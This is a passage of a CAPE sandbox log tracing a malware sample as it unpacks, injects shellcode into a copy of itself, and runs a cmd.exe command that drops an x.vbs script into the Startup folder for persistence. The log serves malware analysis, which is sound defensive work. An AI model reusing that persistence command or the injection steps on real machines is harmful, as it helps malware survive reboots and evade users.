21:32:14,164 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageDraw'\n2025-03-02 21:32:14,164 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.screenshots\"\n2025-03-02 21:32:14,164 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.tlsdump\"\n2025-03-02 21:32:14,164 [root] DEBUG: Initialized auxiliary module \"Browser\"\n2025-03-02 21:32:14,164 [root] DEBUG: attempting to configure 'Browser' from data\n2025-03-02 21:32:14,164 [root] DEBUG: module Browser does not support data configuration, ignoring\n2025-03-02 21:32:14,164 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.browser\"...\n2025-03-02 21:32:14,211 [root] DEBUG: Started auxiliary module modules.auxiliary.browser\n2025-03-02 21:32:14,211 [root] DEBUG: Initialized auxiliary module \"DigiSig\"\n2025-03-02 21:32:14,211 [root] DEBUG: attempting to configure 'DigiSig' from data\n2025-03-02 21:32:14,211 [root] DEBUG: module DigiSig does not support data configuration, ignoring\n2025-03-02 21:32:14,211 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.digisig\"...\n2025-03-02 21:32:14,211 [modules.auxiliary.digisig] DEBUG: Checking for a digital signature\n2025-03-02 21:32:14,726 [modules.auxiliary.digisig] DEBUG: File is not signed\n2025-03-02 21:32:14,726 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json\n2025-03-02 21:32:14,742 [root] DEBUG: Started auxiliary module modules.auxiliary.digisig\n2025-03-02 21:32:14,742 [root] DEBUG: Initialized auxiliary module \"Disguise\"\n2025-03-02 21:32:14,742 [root] DEBUG: attempting to configure 'Disguise' from data\n2025-03-02 21:32:14,742 [root] DEBUG: module Disguise does not support data configuration, ignoring\n2025-03-02 21:32:14,742 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.disguise\"...\n2025-03-02 21:32:14,742 [modules.auxiliary.disguise] INFO: Disguising GUID to e08d2e89-7f40-4d45-8d6d-072407c39dde\n2025-03-02 21:32:14,742 [root] DEBUG: Started auxiliary module modules.auxiliary.disguise\n2025-03-02 21:32:14,742 [root] DEBUG: Initialized auxiliary module \"Human\"\n2025-03-02 21:32:14,742 [root] DEBUG: attempting to configure 'Human' from data\n2025-03-02 21:32:14,742 [root] DEBUG: module Human does not support data configuration, ignoring\n2025-03-02 21:32:14,742 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.human\"...\n2025-03-02 21:32:14,757 [root] DEBUG: Started auxiliary module modules.auxiliary.human\n2025-03-02 21:32:14,757 [root] DEBUG: Initialized auxiliary module \"Screenshots\"\n2025-03-02 21:32:14,757 [root] DEBUG: attempting to configure 'Screenshots' from data\n2025-03-02 21:32:15,101 [root] DEBUG: module Screenshots does not support data configuration, ignoring\n2025-03-02 21:32:15,101 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.screenshots\"...\n2025-03-02 21:32:15,117 [root] DEBUG: Started auxiliary module modules.auxiliary.screenshots\n2025-03-02 21:32:15,117 [root] DEBUG: Initialized auxiliary module \"TLSDumpMasterSecrets\"\n2025-03-02 21:32:15,117 [root] DEBUG: attempting to configure 'TLSDumpMasterSecrets' from data\n2025-03-02 21:32:15,117 [root] DEBUG: module TLSDumpMasterSecrets does not support data configuration, ignoring\n2025-03-02 21:32:15,117 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.tlsdump\"...\n2025-03-02 21:32:15,117 [modules.auxiliary.tlsdump] INFO: lsass.exe found, pid 672\n2025-03-02 21:32:15,961 [lib.api.process] INFO: Monitor config for : C:\\tmp4qgvoq2_\\dll\\672.ini\n2025-03-02 21:32:15,961 [lib.api.process] INFO: Option 'tlsdump' with value '1' sent to monitor\n2025-03-02 21:32:15,961 [lib.api.process] INFO: 64-bit DLL to inject is C:\\tmp4qgvoq2_\\dll\\jRRDNpiv.dll, loader C:\\tmp4qgvoq2_\\bin\\RFFPxZyT.exe\n2025-03-02 21:32:16,039 [root] DEBUG: Loader: Injecting process 672 with C:\\tmp4qgvoq2_\\dll\\jRRDNpiv.dll.\n2025-03-02 21:32:16,070 [root] DEBUG: 672: Python path set to 'C:\\Users\\pacop\\AppData\\Local\\Programs\\Python\\Python310-32'.\n2025-03-02 21:32:16,086 [root] INFO: Disabling sleep skipping.\n2025-03-02 21:32:16,086 [root] DEBUG: 672: TLS secret dump mode enabled.\n2025-03-02 21:32:16,101 [root] DEBUG: 672: RtlInsertInvertedFunctionTable 0x00007FF8138C090E, LdrpInvertedFunctionTableSRWLock 0x00007FF813A1D500\n2025-03-02 21:32:16,101 [root] DEBUG: 672: Monitor initialised: 64-bit capemon loaded in process 672 at 0x00007FFFDAA90000, thread 9588, image base 0x00007FF7BECB0000, stack from 0x000000A91A273000-0x000000A91A280000\n2025-03-02 21:32:16,117 [root] DEBUG: 672: Commandline: C:\\Windows\\system32\\lsass.exe\n2025-03-02 21:32:16,117 [root] DEBUG: 672: Hooked 5 out of 5 functions\n2025-03-02 21:32:16,117 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.\n2025-03-02 21:32:16,117 [root] DEBUG: Successfully injected DLL C:\\tmp4qgvoq2_\\dll\\jRRDNpiv.dll.\n2025-03-02 21:32:16,179 [lib.api.process] INFO: Injected into 64-bit \n2025-03-02 21:32:16,195 [root] DEBUG: Started auxiliary module modules.auxiliary.tlsdump\n2025-03-02 21:32:16,195 [root] DEBUG: 672: TLS 1.2 secrets logged to: C:\\DvvlnNLlY\\tlsdump\\tlsdump.log\n2025-03-02 21:32:24,275 [root] INFO: Restarting WMI Service\n2025-03-02 21:32:25,132 [root] DEBUG: package modules.packages.exe does not support configure, ignoring\n2025-03-02 21:32:25,132 [root] WARNING: configuration error for package modules.packages.exe: error importing data.packages.exe: No module named 'data.packages'\n2025-03-02 21:32:25,132 [lib.core.compound] INFO: C:\\Users\\pacop\\AppData\\Local\\Temp already exists, skipping creation\n2025-03-02 21:32:25,175 [lib.api.process] INFO: Successfully executed process from path \"C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe\" with arguments \"\" with pid 4492\n2025-03-02 21:32:25,175 [lib.api.process] INFO: Monitor config for : C:\\tmp4qgvoq2_\\dll\\4492.ini\n2025-03-02 21:32:25,215 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll, loader C:\\tmp4qgvoq2_\\bin\\RmAUCTK.exe\n2025-03-02 21:32:25,335 [root] DEBUG: Loader: Injecting process 4492 (thread 4148) with C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:25,375 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.\n2025-03-02 21:32:25,416 [root] DEBUG: Successfully injected DLL C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:25,640 [lib.api.process] INFO: Injected into 32-bit \n2025-03-02 21:32:27,656 [lib.api.process] INFO: Successfully resumed \n2025-03-02 21:32:27,707 [root] DEBUG: 4492: Python path set to 'C:\\Users\\pacop\\AppData\\Local\\Programs\\Python\\Python310-32'.\n2025-03-02 21:32:27,737 [root] INFO: Disabling sleep skipping.\n2025-03-02 21:32:27,737 [root] DEBUG: 4492: Dropped file limit defaulting to 100.\n2025-03-02 21:32:27,808 [root] DEBUG: 4492: YaraInit: Compiled 41 rule files\n2025-03-02 21:32:27,817 [root] DEBUG: 4492: YaraInit: Compiled rules saved to file C:\\tmp4qgvoq2_\\data\\yara\\capemon.yac\n2025-03-02 21:32:27,817 [root] DEBUG: 4492: YaraScan: Scanning 0x00400000, size 0x416ec\n2025-03-02 21:32:27,819 [root] DEBUG: 4492: AmsiDumper initialised.\n2025-03-02 21:32:27,819 [root] DEBUG: 4492: Monitor initialised: 32-bit capemon loaded in process 4492 at 0x73340000, thread 4148, image base 0x400000, stack from 0x193000-0x1a0000\n2025-03-02 21:32:27,819 [root] DEBUG: 4492: Commandline: \"C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe\"\n2025-03-02 21:32:27,869 [root] DEBUG: 4492: hook_api: LdrpCallInitRoutine export address 0x771C3190 obtained via GetFunctionAddress\n2025-03-02 21:32:27,877 [root] DEBUG: 4492: hook_api: Warning - SetWindowLongW export address 0x76645E90 differs from GetProcAddress -> 0x74F47150 (apphelp.dll::0x37150)\n2025-03-02 21:32:27,877 [root] DEBUG: 4492: hook_api: Warning - EnumDisplayDevicesA export address 0x7663A090 differs from GetProcAddress -> 0x74F484C0 (apphelp.dll::0x384c0)\n2025-03-02 21:32:27,877 [root] DEBUG: 4492: hook_api: Warning - EnumDisplayDevicesW export address 0x76650860 differs from GetProcAddress -> 0x74F6C1B0 (apphelp.dll::0x5c1b0)\n2025-03-02 21:32:27,879 [root] WARNING: b'Unable to place hook on GetCommandLineA'\n2025-03-02 21:32:27,879 [root] DEBUG: 4492: set_hooks: Unable to hook GetCommandLineA\n2025-03-02 21:32:27,879 [root] WARNING: b'Unable to place hook on GetCommandLineW'\n2025-03-02 21:32:27,879 [root] DEBUG: 4492: set_hooks: Unable to hook GetCommandLineW\n2025-03-02 21:32:27,887 [root] DEBUG: 4492: Hooked 611 out of 613 functions\n2025-03-02 21:32:27,887 [root] DEBUG: 4492: Syscall hook installed, syscall logging level 1\n2025-03-02 21:32:27,887 [root] DEBUG: 4492: WoW64fix: Windows version 6.2 not supported.\n2025-03-02 21:32:27,890 [root] INFO: Loaded monitor into process with pid 4492\n2025-03-02 21:32:27,890 [root] DEBUG: 4492: DLL loaded at 0x76370000: C:\\Windows\\System32\\bcryptPrimitives (0x5f000 bytes).\n2025-03-02 21:32:27,900 [root] DEBUG: 4492: caller_dispatch: Added region at 0x00400000 to tracked regions list (ntdll::memcpy returns to 0x0040B1CA, thread 4148).\n2025-03-02 21:32:27,900 [root] DEBUG: 4492: YaraScan: Scanning 0x00400000, size 0x416ec\n2025-03-02 21:32:27,900 [root] DEBUG: 4492: ProcessImageBase: Main module image at 0x00400000 unmodified (entropy change 0.000000e+00)\n2025-03-02 21:32:27,900 [root] DEBUG: 4492: DLL loaded at 0x73910000: C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.4355_none_c0dc01d438beab35\\COMCTL32 (0x8d000 bytes).\n2025-03-02 21:32:27,910 [root] DEBUG: 4492: DLL loaded at 0x74E80000: C:\\Windows\\system32\\uxtheme (0x74000 bytes).\n2025-03-02 21:32:27,920 [root] DEBUG: 4492: InstrumentationCallback: Added region at 0x763D0000 to tracked regions list (thread 4148).\n2025-03-02 21:32:27,920 [root] DEBUG: 4492: DLL loaded at 0x75650000: C:\\Windows\\System32\\MSCTF (0xd4000 bytes).\n2025-03-02 21:32:27,928 [root] DEBUG: 4492: DLL loaded at 0x75C40000: C:\\Windows\\System32\\shell32 (0x5da000 bytes).\n2025-03-02 21:32:27,930 [root] DEBUG: 4492: DLL loaded at 0x76280000: C:\\Windows\\System32\\psapi (0x6000 bytes).\n2025-03-02 21:32:27,930 [root] DEBUG: 4492: DLL loaded at 0x743B0000: C:\\Windows\\SYSTEM32\\Wldp (0x25000 bytes).\n2025-03-02 21:32:27,930 [root] DEBUG: 4492: DLL loaded at 0x743E0000: C:\\Windows\\SYSTEM32\\windows.storage (0x618000 bytes).\n2025-03-02 21:32:27,930 [root] DEBUG: 4492: api-rate-cap: memcpy hook disabled due to rate\n2025-03-02 21:32:28,001 [root] DEBUG: 4492: DLL loaded at 0x75BB0000: C:\\Windows\\System32\\SHCORE (0x87000 bytes).\n2025-03-02 21:32:28,011 [root] DEBUG: 4492: AllocationHandler: Adding allocation to tracked region list: 0x05840000, size: 0x2e1000.\n2025-03-02 21:32:28,011 [root] DEBUG: 4492: AddTrackedRegion: GetEntropy failed.\n2025-03-02 21:32:28,310 [root] DEBUG: 4492: AllocationHandler: Adding allocation to tracked region list: 0x04970000, size: 0x74000.\n2025-03-02 21:32:28,371 [root] DEBUG: 4492: AddTrackedRegion: GetEntropy failed.\n2025-03-02 21:32:28,371 [root] DEBUG: 4492: AllocationHandler: Processing previous tracked region at: 0x05840000.\n2025-03-02 21:32:28,371 [root] DEBUG: 4492: DumpPEsInRange: Scanning range 0x05840000 - 0x05B20346.\n2025-03-02 21:32:28,381 [root] DEBUG: 4492: ScanForDisguisedPE: PE image located at: 0x05840000\n2025-03-02 21:32:28,381 [root] DEBUG: 4492: DumpImageInCurrentProcess: Attempting to dump virtual PE image.\n2025-03-02 21:32:28,381 [root] DEBUG: 4492: DumpProcess: Instantiating PeParser with address: 0x05840000.\n2025-03-02 21:32:28,381 [root] DEBUG: 4492: DumpProcess: Module entry point VA is 0x0000B10F.\n2025-03-02 21:32:28,381 [root] DEBUG: 4492: readPeSectionsFromProcess: Failed to relocate image back to header image base 0x00400000.\n2025-03-02 21:32:28,422 [lib.common.results] INFO: Uploading file C:\\DvvlnNLlY\\CAPE\\4492_4415792832202032025 to CAPE\\26efa6d8a8a3bc9222199812b7d5cf2564641d2e474fbac0faa3e2777e057c5f; Size is 260096; Max size: 100000000\n2025-03-02 21:32:28,555 [root] DEBUG: 4492: DumpProcess: Module image dump success - dump size 0x3f800.\n2025-03-02 21:32:28,565 [root] DEBUG: 4492: ScanForDisguisedPE: PE image located at: 0x05987DD9\n2025-03-02 21:32:28,565 [root] DEBUG: 4492: DumpImageInCurrentProcess: Attempting to dump 'raw' PE image (process 4492)\n2025-03-02 21:32:28,573 [root] DEBUG: 4492: DumpPE: Instantiating PeParser with address: 0x05987DD9.\n2025-03-02 21:32:28,575 [lib.common.results] INFO: Uploading file C:\\DvvlnNLlY\\CAPE\\4492_77044252832202032025 to CAPE\\7defec1ca7f2b1b0757b40463d8ee1591d7e3261142fa55b3aca0b774cd0d158; Size is 87552; Max size: 100000000\n2025-03-02 21:32:28,646 [root] DEBUG: 4492: DumpPE: PE file at 0x05987DD9 dumped successfully - dump size 0x15600.\n2025-03-02 21:32:28,646 [root] DEBUG: 4492: ScanForDisguisedPE: PE image located at: 0x05999849\n2025-03-02 21:32:28,646 [root] DEBUG: 4492: DumpImageInCurrentProcess: Attempting to dump 'raw' PE image (process 4492)\n2025-03-02 21:32:28,646 [root] DEBUG: 4492: DumpPE: Instantiating PeParser with address: 0x05999849.\n2025-03-02 21:32:28,654 [lib.common.results] INFO: Uploading file C:\\DvvlnNLlY\\CAPE\\4492_18501442832202032025 to CAPE\\021d01fe3793879f57a2942664fc7c096710e94e87ad13dc21467c12edf61546; Size is 11264; Max size: 100000000\n2025-03-02 21:32:28,674 [root] DEBUG: 4492: DumpPE: PE file at 0x05999849 dumped successfully - dump size 0x2c00.\n2025-03-02 21:32:28,676 [root] DEBUG: 4492: ScanForDisguisedPE: PE image located at: 0x0599B0B9\n2025-03-02 21:32:28,676 [root] DEBUG: 4492: DumpImageInCurrentProcess: Attempting to dump virtual PE image.\n2025-03-02 21:32:28,676 [root] DEBUG: 4492: DumpProcess: Instantiating PeParser with address: 0x0599B0B9.\n2025-03-02 21:32:28,676 [root] DEBUG: 4492: DumpProcess: Module entry point VA is 0x00001000.\n2025-03-02 21:32:28,676 [root] DEBUG: 4492: reBasePEImage: Error, invalid image base 0x0599B0B9.\n2025-03-02 21:32:28,676 [root] DEBUG: 4492: readPeSectionsFromProcess: Failed to relocate image back to header image base 0x10000000.\n2025-03-02 21:32:28,676 [lib.common.results] INFO: Uploading file C:\\DvvlnNLlY\\CAPE\\4492_114609042832202032025 to CAPE\\877f2ae5e377c2ed56a87a6084b375875c31dc5d4d2327e9d07bf5576f18ffc4; Size is 13824; Max size: 100000000\n2025-03-02 21:32:28,684 [root] DEBUG: 4492: DumpProcess: Module image dump success - dump size 0x3600.\n2025-03-02 21:32:28,686 [root] DEBUG: 4492: ScanForDisguisedPE: PE image located at: 0x059BEFB0\n2025-03-02 21:32:28,686 [root] DEBUG: 4492: DumpImageInCurrentProcess: Attempting to dump 'raw' PE image (process 4492)\n2025-03-02 21:32:28,686 [root] DEBUG: 4492: DumpPE: Instantiating PeParser with address: 0x059BEFB0.\n2025-03-02 21:32:28,686 [root] DEBUG: 4492: DumpPE: failed to obtain size of last section.\n2025-03-02 21:32:28,686 [root] DEBUG: 4492: DumpImageInCurrentProcess: Failed to dump 'raw' PE image from 0x059BEFB0, dumping memory region.\n2025-03-02 21:32:28,686 [root] DEBUG: 4492: DumpRegion: Dumped PE image(s) from base address 0x05840000, size 3018752 bytes.\n2025-03-02 21:32:28,694 [root] DEBUG: 4492: ProcessTrackedRegion: Dumped region at 0x05840000.\n2025-03-02 21:32:28,697 [root] DEBUG: 4492: YaraScan: Scanning 0x05840000, size 0x2e0346\n2025-03-02 21:32:28,757 [root] DEBUG: 4492: CreateProcessHandler: Injection info set for new process 8980: C:\\Windows\\system32\\cmd.exe, ImageBase: 0x00570000\n2025-03-02 21:32:28,788 [root] INFO: Announced 32-bit process name: cmd.exe pid: 8980\n2025-03-02 21:32:28,826 [lib.api.process] INFO: Monitor config for : C:\\tmp4qgvoq2_\\dll\\8980.ini\n2025-03-02 21:32:28,828 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll, loader C:\\tmp4qgvoq2_\\bin\\RmAUCTK.exe\n2025-03-02 21:32:28,897 [root] DEBUG: Loader: Injecting process 8980 (thread 10680) with C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:28,927 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.\n2025-03-02 21:32:28,929 [root] DEBUG: Successfully injected DLL C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:28,929 [lib.api.process] INFO: Injected into 32-bit \n2025-03-02 21:32:28,968 [root] DEBUG: 8980: Python path set to 'C:\\Users\\pacop\\AppData\\Local\\Programs\\Python\\Python310-32'.\n2025-03-02 21:32:28,968 [root] INFO: Disabling sleep skipping.\n2025-03-02 21:32:28,968 [root] DEBUG: 8980: Dropped file limit defaulting to 100.\n2025-03-02 21:32:28,970 [root] DEBUG: 8980: YaraInit: Compiled rules loaded from existing file C:\\tmp4qgvoq2_\\data\\yara\\capemon.yac\n2025-03-02 21:32:28,970 [root] DEBUG: 8980: YaraScan: Scanning 0x00570000, size 0x595ee\n2025-03-02 21:32:28,970 [root] DEBUG: 8980: AmsiDumper initialised.\n2025-03-02 21:32:28,970 [root] DEBUG: 8980: Monitor initialised: 32-bit capemon loaded in process 8980 at 0x73340000, thread 10680, image base 0x570000, stack from 0x2c03000-0x2d00000\n2025-03-02 21:32:28,970 [root] DEBUG: 8980: Commandline: C:\\Windows\\system32\\cmd.exe /c echo on error resume next:CreateObject(\"WScript.Shell\").Run \"C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe\",1: >\"C:\\Users\\pacop\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\x.vbs\"\n2025-03-02 21:32:28,990 [root] DEBUG: 8980: hook_api: LdrpCallInitRoutine export address 0x771C3190 obtained via GetFunctionAddress\n2025-03-02 21:32:28,998 [root] WARNING: b'Unable to place hook on GetCommandLineA'\n2025-03-02 21:32:29,000 [root] DEBUG: 8980: set_hooks: Unable to hook GetCommandLineA\n2025-03-02 21:32:29,000 [root] WARNING: b'Unable to place hook on GetCommandLineW'\n2025-03-02 21:32:29,000 [root] DEBUG: 8980: set_hooks: Unable to hook GetCommandLineW\n2025-03-02 21:32:29,000 [root] DEBUG: 8980: Hooked 611 out of 613 functions\n2025-03-02 21:32:29,000 [root] DEBUG: 8980: Syscall hook installed, syscall logging level 1\n2025-03-02 21:32:29,000 [root] DEBUG: 8980: WoW64fix: Windows version 10.0 not supported.\n2025-03-02 21:32:29,000 [root] INFO: Loaded monitor into process with pid 8980\n2025-03-02 21:32:29,000 [root] DEBUG: 8980: caller_dispatch: Added region at 0x00570000 to tracked regions list (ntdll::memcpy returns to 0x005868FA, thread 10680).\n2025-03-02 21:32:29,008 [root] DEBUG: 8980: YaraScan: Scanning 0x00570000, size 0x595ee\n2025-03-02 21:32:29,010 [root] DEBUG: 8980: ProcessImageBase: Main module image at 0x00570000 unmodified (entropy change 0.000000e+00)\n2025-03-02 21:32:29,020 [root] DEBUG: 8980: InstrumentationCallback: Added region at 0x763D0000 to tracked regions list (thread 10680).\n2025-03-02 21:32:29,041 [root] INFO: Added new file to list with pid None and path C:\\Users\\pacop\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\x.vbs\n2025-03-02 21:32:29,049 [root] DEBUG: 8980: NtTerminateProcess hook: Attempting to dump process 8980\n2025-03-02 21:32:29,049 [root] DEBUG: 8980: DoProcessDump: Skipping process dump as code is identical on disk.\n2025-03-02 21:32:29,051 [root] INFO: Process with pid 8980 has terminated\n2025-03-02 21:32:29,748 [root] INFO: Process with pid 8980 has terminated\n2025-03-02 21:32:29,748 [root] DEBUG: 4492: DumpPEsInRange: Scanning range 0x04970000 - 0x049E3A50.\n2025-03-02 21:32:29,748 [root] DEBUG: 4492: ScanForDisguisedPE: PE image located at: 0x04970000\n2025-03-02 21:32:29,748 [root] DEBUG: 4492: DumpImageInCurrentProcess: Attempting to dump 'raw' PE image (process 4492)\n2025-03-02 21:32:29,748 [root] DEBUG: 4492: DumpPE: Instantiating PeParser with address: 0x04970000.\n2025-03-02 21:32:29,794 [root] DEBUG: 4492: DumpPE: failed to obtain size of last section.\n2025-03-02 21:32:29,826 [root] DEBUG: 4492: DumpImageInCurrentProcess: Failed to dump 'raw' PE image from 0x04970000, dumping memory region.\n2025-03-02 21:32:29,841 [lib.common.results] INFO: Uploading file C:\\DvvlnNLlY\\CAPE\\4492_7762748291223132025 to CAPE\\1723ac59986f82d29ed48fcf6f24fb977122d39f0d13098bd0d0b14524e9b850; Size is 473680; Max size: 100000000\n2025-03-02 21:32:29,841 [root] DEBUG: 4492: DumpMemory: Payload successfully created: C:\\DvvlnNLlY\\CAPE\\4492_7762748291223132025 (size 473680 bytes)\n2025-03-02 21:32:29,841 [root] DEBUG: 4492: DumpRegion: Dumped entire allocation from 0x04970000, size 475136 bytes.\n2025-03-02 21:32:29,873 [root] DEBUG: 4492: ProcessTrackedRegion: Dumped region at 0x04970000.\n2025-03-02 21:32:29,888 [root] DEBUG: 4492: YaraScan: Scanning 0x04970000, size 0x73a50\n2025-03-02 21:32:29,888 [root] DEBUG: 4492: YaraScan hit: UPX\n2025-03-02 21:32:29,904 [root] DEBUG: 4492: Config: bp0 set to 0x00072307.\n2025-03-02 21:32:29,904 [root] DEBUG: 4492: Config: Hit count for breakpoint 0 set to 1\n2025-03-02 21:32:29,904 [root] DEBUG: 4492: Config: Action0 set to step2oep.\n2025-03-02 21:32:29,904 [root] DEBUG: 4492: SetInitialBreakpoints: Breakpoint 0 set on address 0x049E2307 (RVA 0x72307, type 0, hit count 1, thread 4148)\n2025-03-02 21:32:29,951 [root] DEBUG: 4492: CreateProcessHandler: Injection info set for new process 7456: C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe, ImageBase: 0x00400000\n2025-03-02 21:32:29,982 [root] INFO: Announced 32-bit process name: f1e62c0e7345fc825586.exe pid: 7456\n2025-03-02 21:32:29,982 [lib.api.process] INFO: Monitor config for : C:\\tmp4qgvoq2_\\dll\\7456.ini\n2025-03-02 21:32:29,982 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll, loader C:\\tmp4qgvoq2_\\bin\\RmAUCTK.exe\n2025-03-02 21:32:29,998 [root] DEBUG: Loader: Injecting process 7456 (thread 7632) with C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:29,998 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.\n2025-03-02 21:32:29,998 [root] DEBUG: Successfully injected DLL C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,013 [lib.api.process] INFO: Injected into 32-bit \n2025-03-02 21:32:30,013 [root] DEBUG: 4492: WriteMemoryHandler: Executable binary injected into process 7456 (ImageBase 0x400000)\n2025-03-02 21:32:30,029 [root] DEBUG: 4492: DumpImageInCurrentProcess: Attempting to dump 'raw' PE image (process 4492)\n2025-03-02 21:32:30,029 [root] DEBUG: 4492: DumpPE: Instantiating PeParser with address: 0x04970000.\n2025-03-02 21:32:30,029 [root] DEBUG: 4492: DumpPE: failed to obtain size of last section.\n2025-03-02 21:32:30,029 [root] DEBUG: 4492: DumpImageInCurrentProcess: Failed to dump 'raw' PE image from 0x04970000, dumping memory region.\n2025-03-02 21:32:30,029 [root] DEBUG: 4492: WriteMemoryHandler: Failed to dump PE image from buffer, attempting raw dump.\n2025-03-02 21:32:30,029 [lib.common.results] INFO: Uploading file C:\\DvvlnNLlY\\CAPE\\4492_676541301223132025 to CAPE\\780ab21799eefba66a2c5561d8644aee7298186886eb79765f3c9e4589e17440; Size is 904; Max size: 100000000\n2025-03-02 21:32:30,029 [root] DEBUG: 4492: DumpMemory: Payload successfully created: C:\\DvvlnNLlY\\CAPE\\4492_676541301223132025 (size 904 bytes)\n2025-03-02 21:32:30,029 [root] DEBUG: 4492: WriteMemoryHandler: Dumped malformed PE image from buffer.\n2025-03-02 21:32:30,029 [root] INFO: Announced 32-bit process name: f1e62c0e7345fc825586.exe pid: 7456\n2025-03-02 21:32:30,029 [lib.api.process] INFO: Monitor config for : C:\\tmp4qgvoq2_\\dll\\7456.ini\n2025-03-02 21:32:30,029 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll, loader C:\\tmp4qgvoq2_\\bin\\RmAUCTK.exe\n2025-03-02 21:32:30,044 [root] DEBUG: Loader: Injecting process 7456 (thread 7632) with C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,060 [root] DEBUG: InjectDllViaIAT: Blank import descriptor, aborting IAT patch.\n2025-03-02 21:32:30,060 [root] DEBUG: Successfully injected DLL C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,060 [lib.api.process] INFO: Injected into 32-bit \n2025-03-02 21:32:30,060 [root] DEBUG: 4492: WriteMemoryHandler: shellcode at 0x04970400 (size 0x39c00) injected into process 7456.\n2025-03-02 21:32:30,060 [root] DEBUG: 4492: DumpMemory: Dump at 0x04970400 skipped due to dump limit 10\n2025-03-02 21:32:30,060 [root] DEBUG: 4492: WriteMemoryHandler: Failed to dump injected code/data from buffer.\n2025-03-02 21:32:30,060 [root] INFO: Announced 32-bit process name: f1e62c0e7345fc825586.exe pid: 7456\n2025-03-02 21:32:30,060 [lib.api.process] INFO: Monitor config for : C:\\tmp4qgvoq2_\\dll\\7456.ini\n2025-03-02 21:32:30,060 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll, loader C:\\tmp4qgvoq2_\\bin\\RmAUCTK.exe\n2025-03-02 21:32:30,076 [root] DEBUG: Loader: Injecting process 7456 (thread 7632) with C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,076 [root] DEBUG: InjectDllViaIAT: Blank import descriptor, aborting IAT patch.\n2025-03-02 21:32:30,076 [root] DEBUG: Successfully injected DLL C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,091 [lib.api.process] INFO: Injected into 32-bit \n2025-03-02 21:32:30,091 [root] DEBUG: 4492: WriteMemoryHandler: shellcode at 0x049AA000 (size 0x600) injected into process 7456.\n2025-03-02 21:32:30,091 [root] DEBUG: 4492: DumpMemory: Dump at 0x049AA000 skipped due to dump limit 10\n2025-03-02 21:32:30,091 [root] DEBUG: 4492: WriteMemoryHandler: Failed to dump injected code/data from buffer.\n2025-03-02 21:32:30,091 [root] INFO: Announced 32-bit process name: f1e62c0e7345fc825586.exe pid: 7456\n2025-03-02 21:32:30,091 [lib.api.process] INFO: Monitor config for : C:\\tmp4qgvoq2_\\dll\\7456.ini\n2025-03-02 21:32:30,091 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll, loader C:\\tmp4qgvoq2_\\bin\\RmAUCTK.exe\n2025-03-02 21:32:30,107 [root] DEBUG: Loader: Injecting process 7456 (thread 7632) with C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,107 [root] DEBUG: InjectDllViaIAT: Blank import descriptor, aborting IAT patch.\n2025-03-02 21:32:30,107 [root] DEBUG: Successfully injected DLL C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll.\n2025-03-02 21:32:30,107 [lib.api.process] INFO: Injected into 32-bit \n2025-03-02 21:32:30,107 [root] DEBUG: 4492: WriteMemoryHandler: shellcode at 0x049AA600 (size 0x1200) injected into process 7456.\n2025-03-02 21:32:30,107 [root] DEBUG: 4492: DumpMemory: Dump at 0x049AA600 skipped due to dump limit 10\n2025-03-02 21:32:30,107 [root] DEBUG: 4492: WriteMemoryHandler: Failed to dump injected code/data from buffer.\n2025-03-02 21:32:30,107 [root] INFO: Announced 32-bit process name: f1e62c0e7345fc825586.exe pid: 7456\n2025-03-02 21:32:30,107 [lib.api.process] INFO: Monitor config for : C:\\tmp4qgvoq2_\\dll\\7456.ini\n2025-03-02 21:32:30,107 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmp4qgvoq2_\\dll\\xYfErXKr.dll, loader C:\\tmp4qgvoq2_\\bin\\RmAUCTK.exe\n2025-03-02 21:32:30,107 [root] DEBUG: Loader: Injecting process 7456 (thread 7632) with 